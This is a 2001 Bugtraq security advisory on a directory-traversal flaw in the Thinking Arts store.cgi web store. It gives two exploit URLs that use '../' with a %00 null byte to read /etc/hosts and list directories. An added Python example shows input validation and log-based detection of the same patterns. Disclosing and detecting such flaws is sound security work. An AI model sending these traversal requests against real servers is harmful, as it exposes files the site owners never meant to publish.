[19259] in bugtraq
Thinking Arts Store.cgi Directory Traversal
daemon@ATHENA.MIT.EDU (slipy@B10Z.NET)
Fri Feb 16 13:08:53 2001
Message-Id: <20010216071401.16151.qmail@securityfocus.com>
Date: Fri, 16 Feb 2001 07:14:01 -0000
Reply-To: slipy@B10Z.NET
From: slipy@B10Z.NET
To: BUGTRAQ@SECURITYFOCUS.COM
Introduction:
The Thinking Arts LTD E-Commerce package ships with a
webstore frontend called store.cgi, through which
customers order products from the site's SQL-backed
catalogue.
The vendors website is:
http://www.thinkingarts.com/
Problem: Simple Directory Traversal
Inserting "../" sequences into the StartID parameter of
the URL allows an attacker to view any file on the server,
and also to list any directory on the server, that the
user the vulnerable httpd runs as has permission to access.
Remote execution of commands does not appear to be
possible with this directory traversal bug, but directory
listings are.
Please note that you do need the %00.html at the end
of the request: the %00 is a null byte that truncates the
file name when it is opened, so the trailing .html that the
script expects is ignored.
Examples:
http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
^^ = Will obviously open the hosts file.
http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html
^^ = Will obviously list the /etc/ directory.
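An added hardening and detection example in Python (not code from this advisory or from Thinking Arts): resolve_start_id is a hypothetical safe replacement for the page lookup store.cgi performs, rejecting the null-byte and dot-dot forms shown above, and flag_traversal scans constructed access-log lines for the same patterns. The catalogue directory and the idea that the server side supplies the .html suffix itself are assumptions.

```python
import os
import re
from urllib.parse import unquote

# Added illustration, not Thinking Arts code. Assumed layout: StartID names a
# catalogue page and the server-side code supplies the ".html" suffix itself.
CATALOGUE_DIR = "/var/www/store/pages"

def resolve_start_id(start_id, catalogue_dir=CATALOGUE_DIR):
    """Map a raw StartID query value to a file path, or None if it is unsafe."""
    decoded = unquote(start_id)
    # A NUL byte ends the string inside the C open() beneath a CGI script, so
    # "../etc/hosts%00.html" would open /etc/hosts; reject it outright.
    if "\x00" in decoded:
        return None
    # Allow only a bare page name: no separators and no leading dots.
    if not decoded or "/" in decoded or "\\" in decoded or decoded.startswith("."):
        return None
    candidate = os.path.join(catalogue_dir, decoded + ".html")
    # Defence in depth: resolve symlinks and confirm containment in the root.
    root = os.path.realpath(catalogue_dir)
    real = os.path.realpath(candidate)
    if os.path.commonpath([root, real]) != root:
        return None
    return real

# Detection: store.cgi requests whose StartID carries a dot-dot segment or a
# NUL byte, in raw or percent-encoded form.
TRAVERSAL_RE = re.compile(
    r"store\.cgi\?\S*StartID=\S*(?:(?:\.\.|%2e%2e)(?:/|%2f)|%00)", re.IGNORECASE
)

def flag_traversal(log_lines):
    """Return the access-log lines that look like StartID traversal attempts."""
    return [line for line in log_lines if TRAVERSAL_RE.search(line)]

# Constructed Common Log Format lines for a self-check; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2001:07:14:01 +0000] "GET /cgi-bin/store.cgi?StartID=widgets HTTP/1.0" 200 4120',
    '10.0.0.9 - - [16/Feb/2001:07:15:22 +0000] "GET /cgi-bin/store.cgi?StartID=../etc/hosts%00.html HTTP/1.0" 200 611',
    '10.0.0.9 - - [16/Feb/2001:07:15:40 +0000] "GET /cgi-bin/store.cgi?StartID=..%2fetc%2f%00.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for line in flag_traversal(SAMPLE_LOG):
        print("ALERT:", line)
```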
Solution:
The vendor has been contacted. No reply from them yet,
and since only 3 sites that signed up for their dumb
service are affected, it doesn't really matter now,
does it?
--------------------
b10z cgi advisory.
slipy@b10z.net
February 16th, 2001.